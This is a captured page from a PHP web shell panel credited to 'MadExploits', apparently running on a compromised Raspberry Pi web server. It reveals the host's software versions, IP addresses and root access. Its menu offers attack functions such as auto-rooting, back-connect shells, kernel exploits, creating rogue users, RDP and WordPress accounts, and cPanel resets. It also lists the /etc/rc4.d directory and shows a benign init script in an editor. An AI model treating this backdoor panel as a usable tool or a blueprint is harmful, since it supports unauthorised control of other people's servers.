Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.15
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
rc4.d /
[ HOME SHELL ]
Name
Size
Permission
Action
K01apache-htcacheclean
2.43
KB
-rwxr-xr-x
K01nginx
4.47
KB
-rwxr-xr-x
S01apache2
7.99
KB
-rwxr-xr-x
S01avahi-daemon
2.34
KB
-rwxr-xr-x
S01bluetooth
2.88
KB
-rwxr-xr-x
S01console-setup.sh
1.2
KB
-rwxr-xr-x
S01cron
2.99
KB
-rwxr-xr-x
S01cups
2.74
KB
-rwxr-xr-x
S01cups-browsed
1.92
KB
-rwxr-xr-x
S01dbus
2.75
KB
-rwxr-xr-x
S01dhcpcd
1.86
KB
-rwxr-xr-x
S01dphys-swapfile
2.15
KB
-rwxr-xr-x
S01exim4
6.99
KB
-rwxr-xr-x
S01lightdm
2.55
KB
-rwxr-xr-x
S01nmbd
1.89
KB
-rwxr-xr-x
S01paxctld
2.72
KB
-rwxr-xr-x
S01plymouth
1.33
KB
-rwxr-xr-x
S01raspi-config
1.18
KB
-rwxr-xr-x
S01rng-tools
1.97
KB
-rwxr-xr-x
S01rsync
4.31
KB
-rwxr-xr-x
S01rsyslog
2.8
KB
-rwxr-xr-x
S01samba-ad-dc
2.21
KB
-rwxr-xr-x
S01saned
2.17
KB
-rwxr-xr-x
S01sendmail
33.32
KB
-rwxr-xr-x
S01smbd
2.02
KB
-rwxr-xr-x
S01ssh
3.85
KB
-rwxr-xr-x
S01sudo
1.01
KB
-rwxr-xr-x
S01triggerhappy
3.14
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : S01paxctld
#!/bin/sh ### BEGIN INIT INFO # Provides: paxctld # Required-Start: $local_fs $network $remote_fs $syslog # Required-Stop: $local_fs $network $remote_fs $syslog # Default-Start: 2 3 4 5 # Default-Stop: 0 1 6 ### END INIT INFO # Author: Brad Spengler <spender@grsecurity.net> # Do NOT "set -e" # PATH should only include /usr/* if it runs after the mountnfs.sh script PATH=/sbin:/usr/sbin:/bin:/usr/bin DESC="PaX flags maintenance daemon" NAME=paxctld DAEMON=/sbin/paxctld PIDFILE=/var/run/$NAME.pid DAEMON_ARGS="-d -p $PIDFILE" SCRIPTNAME=/etc/init.d/$NAME # Exit if the package is not installed [ -x "$DAEMON" ] || exit 0 # Load the VERBOSE setting and other rcS variables . /lib/init/vars.sh # Define LSB log_* functions. # Depend on lsb-base (>= 3.2-14) to ensure that this file is present # and status_of_proc is working. . /lib/lsb/init-functions check_for_upstart() { if init_is_upstart; then exit $1 fi } # # Function that starts the daemon/service # do_start() { # Return # 0 if daemon has been started # 1 if daemon was already running # 2 if daemon could not be started start-stop-daemon --start --quiet --pidfile $PIDFILE --exec $DAEMON --test > /dev/null \ || return 1 start-stop-daemon --start --quiet --pidfile $PIDFILE --exec $DAEMON -- \ $DAEMON_ARGS \ || return 2 } # # Function that stops the daemon/service # do_stop() { # Return # 0 if daemon has been stopped # 1 if daemon was already stopped # 2 if daemon could not be stopped # other if a failure occurred start-stop-daemon --stop --quiet --retry=TERM/30/KILL/5 --pidfile $PIDFILE --name $NAME RETVAL="$?" [ "$RETVAL" = 2 ] && return 2 start-stop-daemon --stop --quiet --oknodo --retry=0/30/KILL/5 --exec $DAEMON [ "$?" = 2 ] && return 2 # Many daemons don't delete their pidfiles when they exit. rm -f $PIDFILE return "$RETVAL" } case "$1" in start) check_for_upstart 1 log_daemon_msg "Starting $DESC" "$NAME" do_start case "$?" in 0|1) log_end_msg 0 ;; 2) log_end_msg 1 ;; esac ;; stop) check_for_upstart 0 log_daemon_msg "Stopping $DESC" "$NAME" do_stop case "$?" in 0|1) log_end_msg 0 ;; 2) log_end_msg 1 ;; esac ;; status) check_for_upstart 1 status_of_proc "$DAEMON" "$NAME" && exit 0 || exit $? ;; restart|force-reload) check_for_upstart 1 log_daemon_msg "Restarting $DESC" "$NAME" do_stop case "$?" in 0|1) do_start case "$?" in 0) log_end_msg 0 ;; 1) log_end_msg 1 ;; # Old process is still running *) log_end_msg 1 ;; # Failed to start esac ;; *) # Failed to stop log_end_msg 1 ;; esac ;; *) #echo "Usage: $SCRIPTNAME {start|stop|restart|reload|force-reload}" >&2 echo "Usage: $SCRIPTNAME {start|stop|status|restart|force-reload}" >&2 exit 3 ;; esac :
Close